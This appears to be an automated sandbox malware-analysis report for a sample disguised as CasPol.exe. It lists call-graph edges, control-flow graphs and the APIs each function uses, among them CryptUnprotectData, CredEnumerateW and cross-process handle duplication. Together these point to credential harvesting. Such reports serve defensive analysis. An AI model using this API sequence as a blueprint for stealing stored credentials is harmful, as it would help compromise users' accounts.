11 API calls 40063->40137 40065->39886 40066->39888 40067->39891 40069 43a6f5 40068->40069 40070 43a765 40068->40070 40069->40070 40157 42a115 40069->40157 40070->39894 40077 4397fd memset 40070->40077 40074 43a73d 40074->40070 40075 42a115 147 API calls 40074->40075 40075->40070 40076->39896 40077->39903 40078->39894 40079->39918 40080->39907 40081->39912 40082->39908 40083->39911 40084->39916 40085->39920 40086->39922 40087->39926 40088->39934 40089->39931 40090->39935 40091->40007 40092->39928 40093->39936 40094->39940 40095->39941 40096->39941 40097->39950 40098->39954 40099->39958 40100->39965 40101->39972 40102->39980 40103->39984 40104->40000 40105->40005 40106->40024 40107->40024 40108->40024 40109->40020 40110->40027 40111->40032 40112->40003 40113->40003 40114->40003 40115->40004 40116->40011 40117->40014 40118->40016 40119->40021 40120->40025 40121->40029 40122->40033 40123->40040 40124->40039 40125->40040 40126->40043 40127->40045 40128->40047 40129->40049 40130->40051 40131->40053 40132->40055 40133->40057 40134->40059 40135->40061 40136->40063 40137->40007 40138->39971 40139->39964 40140->39969 40141->39973 40142->39983 40143->39990 40144->39962 40145->39963 40146->39970 40147->39974 40148->39982 40149->39985 40150->39992 40151->39990 40152->39995 40153->39997 40154->40007 40155->39949 40156->39894 40158 42a175 40157->40158 40160 42a122 40157->40160 40158->40070 40163 42b13b 147 API calls 40158->40163 40160->40158 40161 42a115 147 API calls 40160->40161 40164 43a174 40160->40164 40188 42a0a8 147 API calls 40160->40188 40161->40160 40163->40074 40178 43a196 40164->40178 40179 43a19e 40164->40179 40165 43a306 40165->40178 40208 4388c4 14 API calls 40165->40208 40168 42a115 147 API calls 40168->40179 40170 43a642 40170->40178 40212 4169a7 11 API calls 40170->40212 40174 43a635 40211 42c02e memset 40174->40211 40178->40160 40179->40165 40179->40168 40179->40178 40189 42ff8c 40179->40189 40197 415a91 40179->40197 40201 4165ff 40179->40201 40204 439504 13 API calls 40179->40204 40205 4312d0 147 API calls 40179->40205 40206 42be4c memcpy memcpy memcpy memset memcpy 40179->40206 40207 43a121 11 API calls 40179->40207 40181 4169a7 11 API calls 40182 43a325 40181->40182 40182->40170 40182->40174 40182->40178 40182->40181 40183 42b5b5 memset memcpy 40182->40183 40184 42bf4c 14 API calls 40182->40184 40187 4165ff 11 API calls 40182->40187 40209 42b63e 14 API calls 40182->40209 40210 42bfcf memcpy 40182->40210 40183->40182 40184->40182 40187->40182 40188->40160 40213 43817e 40189->40213 40191 42ff99 40192 42ffe3 40191->40192 40193 42ffd0 40191->40193 40196 42ff9d 40191->40196 40218 4169a7 11 API calls 40192->40218 40217 4169a7 11 API calls 40193->40217 40196->40179 40198 415a9d 40197->40198 40199 415ab3 40198->40199 40200 415aa4 memset 40198->40200 40199->40179 40200->40199 40365 4165a0 40201->40365 40204->40179 40205->40179 40206->40179 40207->40179 40208->40182 40209->40182 40210->40182 40211->40170 40212->40178 40214 438187 40213->40214 40216 438192 40213->40216 40219 4380f6 40214->40219 40216->40191 40217->40196 40218->40196 40221 43811f 40219->40221 40220 438164 40220->40216 40221->40220 40223 4300e8 3 API calls 40221->40223 40224 437e5e 40221->40224 40223->40221 40247 437d3c 40224->40247 40226 437eb3 40226->40221 40227 437ea9 40227->40226 40232 437f22 40227->40232 40262 41f432 40227->40262 40230 437f06 40309 415c56 11 API calls 40230->40309 40234 432d4e 3 API calls 40232->40234 40237 437f7f 40232->40237 40233 437f95 40310 415c56 11 API calls 40233->40310 40234->40237 40235 43802b 40238 4165ff 11 API calls 40235->40238 40237->40233 40237->40235 40239 438054 40238->40239 40273 437371 40239->40273 40242 43806b 40243 438094 40242->40243 40311 42f50e 138 API calls 40242->40311 40245 437fa3 40243->40245 40246 4300e8 3 API calls 40243->40246 40245->40226 40312 41f638 104 API calls 40245->40312 40246->40245 40248 437d69 40247->40248 40251 437d80 40247->40251 40313 437ccb 11 API calls 40248->40313 40249 437d76 40249->40227 40251->40249 40252 437da3 40251->40252 40254 437d90 40251->40254 40255 438460 134 API calls 40252->40255 40254->40249 40317 437ccb 11 API calls 40254->40317 40258 437dcb 40255->40258 40256 437de8 40316 424f26 123 API calls 40256->40316 40258->40256 40314 444283 13 API calls 40258->40314 40260 437dfc 40315 437ccb 11 API calls 40260->40315 40263 41f54d 40262->40263 40269 41f44f 40262->40269 40264 41f466 40263->40264 40347 41c635 memset memset 40263->40347 40264->40230 40264->40232 40269->40264 40271 41f50b 40269->40271 40318 41f1a5 40269->40318 40343 41c06f memcmp 40269->40343 40344 41f3b1 90 API calls 40269->40344 40345 41f398 86 API calls 40269->40345 40271->40263 40271->40264 40346 41c295 86 API calls 40271->40346 40348 41703f 40273->40348 40275 437399 40276 43739d 40275->40276 40278 4373ac 40275->40278 40355 4446ea 11 API calls 40276->40355 40279 416935 16 API calls 40278->40279 40280 4373ca 40279->40280 40281 438460 134 API calls 40280->40281 40286 4251c4 137 API calls 40280->40286 40290 415a91 memset 40280->40290 40293 43758f 40280->40293 40305 437584 40280->40305 40308 437d3c 135 API calls 40280->40308 40356 425433 13 API calls 40280->40356 40357 425413 17 API calls 40280->40357 40358 42533e 16 API calls 40280->40358 40359 42538f 16 API calls 40280->40359 40360 42453e 123 API calls 40280->40360 40281->40280 40282 4375bc 40284 415c7d 16 API calls 40282->40284 40285 4375d2 40284->40285 40287 4442e6 11 API calls 40285->40287 40307 4373a7 40285->40307 40286->40280 40288 4375e2 40287->40288 40288->40307 40363 444283 13 API calls 40288->40363 40290->40280 40361 42453e 123 API calls 40293->40361 40296 4375f4 40299 437620 40296->40299 40300 43760b 40296->40300 40298 43759f 40301 416935 16 API calls 40298->40301 40303 416935 16 API calls 40299->40303 40364 444283 13 API calls 40300->40364 40301->40305 40303->40307 40305->40282 40362 42453e 123 API calls 40305->40362 40306 437612 memcpy 40306->40307 40307->40242 40308->40280 40309->40226 40310->40245 40311->40243 40312->40226 40313->40249 40314->40260 40315->40256 40316->40249 40317->40249 40319 41bc3b 101 API calls 40318->40319 40320 41f1b4 40319->40320 40321 41edad 86 API calls 40320->40321 40328 41f282 40320->40328 40322 41f1cb 40321->40322 40323 41f1f5 memcmp 40322->40323 40324 41f20e 40322->40324 40322->40328 40323->40324 40325 41f21b memcmp 40324->40325 40324->40328 40326 41f326 40325->40326 40329 41f23d 40325->40329 40327 41ee6b 86 API calls 40326->40327 40326->40328 40327->40328 40328->40269 40329->40326 40330 41f28e memcmp 40329->40330 40332 41c8df 56 API calls 40329->40332 40330->40326 40331 41f2a9 40330->40331 40331->40326 40334 41f308 40331->40334 40335 41f2d8 40331->40335 40333 41f269 40332->40333 40333->40326 40336 41f287 40333->40336 40337 41f27a 40333->40337 40334->40326 40341 4446ce 11 API calls 40334->40341 40338 41ee6b 86 API calls 40335->40338 40336->40330 40339 41ee6b 86 API calls 40337->40339 40340 41f2e0 40338->40340 40339->40328 40342 41b1ca memset 40340->40342 40341->40326 40342->40328 40343->40269 40344->40269 40345->40269 40346->40263 40347->40264 40349 417044 40348->40349 40350 41705c 40348->40350 40352 416760 11 API calls 40349->40352 40354 417055 40349->40354 40351 417075 40350->40351 40353 41707a 11 API calls 40350->40353 40351->40275 40352->40354 40353->40349 40354->40275 40355->40307 40356->40280 40357->40280 40358->40280 40359->40280 40360->40280 40361->40298 40362->40282 40363->40296 40364->40306 40370 415cfe 40365->40370 40375 415d23 __aullrem __aulldvrm 40370->40375 40377 41628e 40370->40377 40371 4163ca 40384 416422 11 API calls 40371->40384 40373 416172 memset 40373->40375 40374 416422 10 API calls 40374->40375 40375->40371 40375->40373 40375->40374 40376 415cb9 10 API calls 40375->40376 40375->40377 40376->40375 40378 416520 40377->40378 40379 416527 40378->40379 40383 416574 40378->40383 40380 416544 40379->40380 40379->40383 40385 4156aa 11 API calls 40379->40385 40382 416561 memcpy 40380->40382 40380->40383 40382->40383 40383->40179 40384->40377 40385->40380 40407 41493c EnumResourceNamesW 37670 4287c1 37671 4287d2 37670->37671 37672 429ac1 37670->37672 37673 428818 37671->37673 37674 42881f 37671->37674 37688 425711 37671->37688 37684 425ad6 37672->37684 37740 415c56 11 API calls 37672->37740 37707 42013a 37673->37707 37735 420244 97 API calls 37674->37735 37679 4260dd 37734 424251 120 API calls 37679->37734 37681 4259da 37733 416760 11 API calls 37681->37733 37687 429a4d 37689 429a66 37687->37689 37694 429a9b 37687->37694 37688->37672 37688->37681 37688->37687 37690 422aeb memset memcpy memcpy 37688->37690 37693 4260a1 37688->37693 37703 4259c2 37688->37703 37706 425a38 37688->37706 37723 4227f0 memset memcpy 37688->37723 37724 422b84 15 API calls 37688->37724 37725 422b5d memset memcpy memcpy 37688->37725 37726 422640 13 API calls 37688->37726 37728 4241fc 11 API calls 37688->37728 37729 42413a 90 API calls 37688->37729 37736 415c56 11 API calls 37689->37736 37690->37688 37732 415c56 11 API calls 37693->37732 37695 429a96 37694->37695 37738 416760 11 API calls 37694->37738 37739 424251 120 API calls 37695->37739 37697 429a7a 37737 416760 11 API calls 37697->37737 37703->37684 37727 415c56 11 API calls 37703->37727 37706->37703 37730 422640 13 API calls 37706->37730 37731 4226e0 12 API calls 37706->37731 37708 42014c 37707->37708 37711 420151 37707->37711 37750 41e466 97 API calls 37708->37750 37710 420162 37710->37688 37711->37710 37712 4201b3 37711->37712 37713 420229 37711->37713 37714 4201b8 37712->37714 37715 4201dc 37712->37715 37713->37710 37716 41fd5e 86 API calls 37713->37716 37741 41fbdb 37714->37741 37715->37710 37719 4201ff 37715->37719 37747 41fc4c 37715->37747 37716->37710 37719->37710 37722 42013a 97 API calls 37719->37722 37722->37710 37723->37688 37724->37688 37725->37688 37726->37688 37727->37681 37728->37688 37729->37688 37730->37706 37731->37706 37732->37681 37733->37679 37734->37684 37735->37688 37736->37697 37737->37695 37738->37695 37739->37672 37740->37681 37742 41fbf1 37741->37742 37743 41fbf8 37741->37743 37746 41fc39 37742->37746 37765 4446ce 11 API calls 37742->37765 37755 41ee26 37743->37755 37746->37710 37751 41fd5e 37746->37751 37748 41ee6b 86 API calls 37747->37748 37749 41fc5d 37748->37749 37749->37715 37750->37711 37753 41fd65 37751->37753 37752 41fdab 37752->37710 37753->37752 37754 41fbdb 86 API calls 37753->37754 37754->37753 37756 41ee41 37755->37756 37757 41ee32 37755->37757 37766 41edad 37756->37766 37769 4446ce 11 API calls 37757->37769 37761 41ee3c 37761->37742 37763 41ee58 37763->37761 37771 41ee6b 37763->37771 37765->37746 37775 41be52 37766->37775 37769->37761 37770 41eb85 11 API calls 37770->37763 37772 41ee70 37771->37772 37773 41ee78 37771->37773 37828 41bf99 86 API calls 37772->37828 37773->37761 37776 41be6f 37775->37776 37777 41be5f 37775->37777 37781 41be8c 37776->37781 37807 418c63 memset memset 37776->37807 37806 4446ce 11 API calls 37777->37806 37779 41be69 37779->37761 37779->37770 37781->37779 37782 41bf3a 37781->37782 37784 41bed1 37781->37784 37794 41bee7 37781->37794 37810 4446ce 11 API calls 37782->37810 37786 41bef0 37784->37786 37787 41bee2 37784->37787 37789 41bf01 37786->37789 37786->37794 37796 41ac13 37787->37796 37788 41bf24 memset 37788->37779 37789->37788 37790 41bf14 37789->37790 37808 418a6d memset memcpy memset 37789->37808 37809 41a223 memset memcpy memset 37790->37809 37794->37779 37811 41a453 86 API calls 37794->37811 37795 41bf20 37795->37788 37797 41ac3f memset 37796->37797 37799 41ac52 37796->37799 37798 41acd9 37797->37798 37798->37794 37801 41ac6a 37799->37801 37812 41dc14 19 API calls 37799->37812 37802 41aca1 37801->37802 37813 41519d 37801->37813 37802->37798 37804 41acc0 memset 37802->37804 37805 41accd memcpy 37802->37805 37804->37798 37805->37798 37806->37779 37807->37781 37808->37790 37809->37795 37810->37794 37812->37801 37816 4175ed 37813->37816 37824 417570 SetFilePointer 37816->37824 37819 4151b3 37819->37802 37820 41760a ReadFile 37821 417637 37820->37821 37822 417627 GetLastError 37820->37822 37821->37819 37823 41763e memset 37821->37823 37822->37819 37823->37819 37825 4175b2 37824->37825 37826 41759c GetLastError 37824->37826 37825->37819 37825->37820 37826->37825 37827 4175a8 GetLastError 37826->37827 37827->37825 37828->37773 37829 417bc5 37830 417c61 37829->37830 37831 417bda 37829->37831 37831->37830 37832 417bf6 UnmapViewOfFile CloseHandle 37831->37832 37834 417c2c 37831->37834 37836 4175b7 37831->37836 37832->37831 37832->37832 37834->37831 37841 41851e 20 API calls 37834->37841 37837 4175d6 CloseHandle 37836->37837 37838 4175c8 37837->37838 37839 4175df 37837->37839 37838->37839 37840 4175ce Sleep 37838->37840 37839->37831 37840->37837 37841->37834 39868 4147f3 39871 414561 39868->39871 39870 414813 39872 41456d 39871->39872 39873 41457f GetPrivateProfileIntW 39871->39873 39876 4143f1 memset _itow WritePrivateProfileStringW 39872->39876 39873->39870 39875 41457a 39875->39870 39876->39875

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 358 40de74-40de78 355->358 359 40de65-40de6c 355->359 358->352 358->355 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                    • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                    • API String ID: 708747863-3398334509
                                                                                                                    • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                    • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                    • free.MSVCRT ref: 00418803
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1355100292-0
                                                                                                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                    APIs
                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 767404330-0
                                                                                                                    • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                    • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$FirstNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1690352074-0
                                                                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0041898C
                                                                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoSystemmemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3558857096-0
                                                                                                                    • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                    • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 44 44558e-445594 call 444b06 4->44 45 44557e-44558c call 4136c0 call 41366b 4->45 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 37 445823-445826 14->37 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 49 445879-44587c 18->49 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 82 445685 21->82 83 4456b2-4456b5 call 40b1ab 21->83 31 445605-445607 22->31 32 445603 22->32 29 4459f2-4459fa 23->29 30 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->30 132 44592d-445945 call 40b6ef 24->132 133 44594a 24->133 39 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 29->39 40 445b29-445b32 29->40 151 4459d0-4459e8 call 40b6ef 30->151 152 4459ed 30->152 31->21 43 445609-44560d 31->43 32->31 50 44584c-445854 call 40b1ab 37->50 51 445828 37->51 181 445b08-445b15 call 40ae51 39->181 52 445c7c-445c85 40->52 53 445b38-445b96 memset * 3 40->53 43->21 47 44560f-445641 call 4087b3 call 40a889 call 4454bf 43->47 44->3 45->44 148 445665-445670 call 40b1ab 47->148 149 445643-445663 call 40a9b5 call 4087b3 47->149 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 50->13 66 44582e-445847 call 40a9b5 call 4087b3 51->66 59 445d1c-445d25 52->59 60 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 52->60 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 53->67 68 445b98-445ba0 53->68 87 445fae-445fb2 59->87 88 445d2b-445d3b 59->88 167 445cf5 60->167 168 445cfc-445d03 60->168 64->19 80 445884-44589d call 40a9b5 call 4087b3 65->80 135 445849 66->135 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 154 44589f 80->154 81->52 97 44568b-4456a4 call 40a9b5 call 4087b3 82->97 114 4456ba-4456c4 83->114 102 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->102 103 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->103 156 4456a9-4456b0 97->156 161 445d67-445d6c 102->161 162 445d71-445d83 call 445093 102->162 196 445e17 103->196 197 445e1e-445e25 103->197 128 4457f9 114->128 129 4456ca-4456d3 call 413cfa call 413d4c 114->129 128->6 172 4456d8-4456f7 call 40b2cc call 413fa6 129->172 132->133 133->23 135->50 148->114 149->148 151->152 152->29 154->64 156->83 156->97 174 445fa1-445fa9 call 40b6ef 161->174 162->87 167->168 179 445d05-445d13 168->179 180 445d17 168->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->59 200 445b17-445b27 call 40aebe 181->200 201 445aa3-445ab0 call 40add4 181->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->40 201->181 218 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->218 242 445e62-445e69 202->242 243 445e5b 202->243 223 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->223 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->181 223->87 255 445f9b 223->255 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->52 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->223 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004455C2
                                                                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                    • memset.MSVCRT ref: 0044570D
                                                                                                                    • memset.MSVCRT ref: 00445725
                                                                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
